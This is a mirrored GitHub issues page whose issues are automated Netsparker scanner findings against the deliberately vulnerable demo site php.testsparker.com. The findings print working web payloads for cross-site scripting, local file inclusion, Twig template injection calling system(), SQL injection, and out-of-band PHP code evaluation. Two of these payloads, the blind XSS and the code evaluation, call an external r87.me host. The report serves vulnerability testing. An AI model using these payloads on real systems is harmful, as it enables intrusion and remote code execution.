Giter Site home page Giter Site logo

cloudmigration's People

Contributors

louisianatiger avatar

Watchers

 avatar

cloudmigration's Issues

Vulnerability - Cross-site Scripting

URL: http://php.testsparker.com/artist.php?id=<scRipt>netsparker(0x03EA5C)</scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: <scRipt>netsparker(0x03EA5C)</scRipt>

Proof URL :
http://php.testsparker.com/artist.php?id=%3cscRipt%3ealert(0x03EA5C)%3c%2fscRipt%3e

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a4bd4f2e58d14c794b1dad64041a9435

Vulnerability - Local File Inclusion

URL: http://php.testsparker.com/process.php?file=/../../../../../../../../../../windows/win.ini%00.nsp
Name: Local File Inclusion
Severity: High
Confirmed: True

ParameterName: file
ParameterType: GET
Payload: /../../../../../../../../../../windows/win.ini%00.nsp

[IAST] Source File :
C:/AppServ/www/process.php on line 25

[IAST] Extra Information :
"include" was called. Payload: /../../../../../../../../../../windows/win.ini�.nsp

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/131f1de5ce8f4000a99dad640419c516

Vulnerability - Code Execution via SSTI (PHP Twig)

URL: http://php.testsparker.com/artist.php?id={{_self.env.registerUndefinedFilterCallback(&quot;system&quot;)}}{{_self.env.getFilter(&quot;SET /A 268409241 - 8073")}}
Name: Code Execution via SSTI (PHP Twig)
Severity: Critical
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("SET /A 268409241 - 8073")}}

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/a6130f4da4f047fc1a28ad64041a8564

Vulnerability - SQL Injection (IAST)

URL: http://php.testsparker.com/artist.php?id=482810 434075
Name: SQL Injection (IAST)
Severity: Critical
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: 482810 434075

[IAST] Source File :
C:/AppServ/www/Programmatic/mysqlCall.php on line 89

[IAST] Extra Information :
"mysql_query" was called.
Stack trace:

  1. mysqlCallClassicWith2Groups([string] "482810 434075", [string] "numeric", [string] "SQS") Payload: SELECT * FROM actor WHERE ((actor_id = 482810 434075 ));

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/631e17a592724ecf0fa9ad720370d64f

Vulnerability - Out of Band Code Evaluation (PHP)

URL: http://php.testsparker.com/hello.php?name=+gethostbyname(trim(&#39;jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq&#39;.&#39;31m.r87.me&#39;));//
Name: Out of Band Code Evaluation (PHP)
Severity: Critical
Confirmed: True

ParameterName: name
ParameterType: GET
Payload: +gethostbyname(trim('jlcxsvyefhmttrq1l0_a4v3toqijhfq6xfry3yzq'.'31m.r87.me'));//

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/126def9424c74bfc986aad64041daa17

Vulnerability - Internal Server Error

URL: http://php.testsparker.com/artist.php?id=%{#context[&quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&quot;].addHeader(&quot;a&quot;,268409241-87309)}
Name: Internal Server Error
Severity: Low
Confirmed: True

ParameterName: id
ParameterType: GET
Payload: %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-87309)}

Page Type :
Other

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7ec08207d11645ba02aaad64041a7da0

Vulnerability - [Possible] Blind Cross-site Scripting

URL: http://php.testsparker.com/products.php?pro=&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg&#46;r87&#46;me"></scRipt>
Name: [Possible] Blind Cross-site Scripting
Severity: High
Certainty: 70%

ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt src="//jlcxsvyefhyzkeqaieedq2giznn1torh-hn0m2ywsrg.r87.me"></scRipt>

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/7d9c50fdef9e40199a20ad64041daa64

Vulnerability - Cross-site Scripting

URL: http://php.testsparker.com/products.php?pro=&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;netsparker(0x03E6FE)&lt;/scRipt>
Name: Cross-site Scripting
Severity: High
Confirmed: True

ParameterName: pro
ParameterType: GET
Payload: '"--></style></scRipt><scRipt>netsparker(0x03E6FE)</scRipt>

Proof URL :
http://php.testsparker.com/products.php?pro=&#39;%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x03E6FE)%3C/scRipt%3E

You can see vulnerability details from the link below:
https://www.netsparkercloud.com/issues/detail/2eedc35206524f24e103ad64041a7904

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.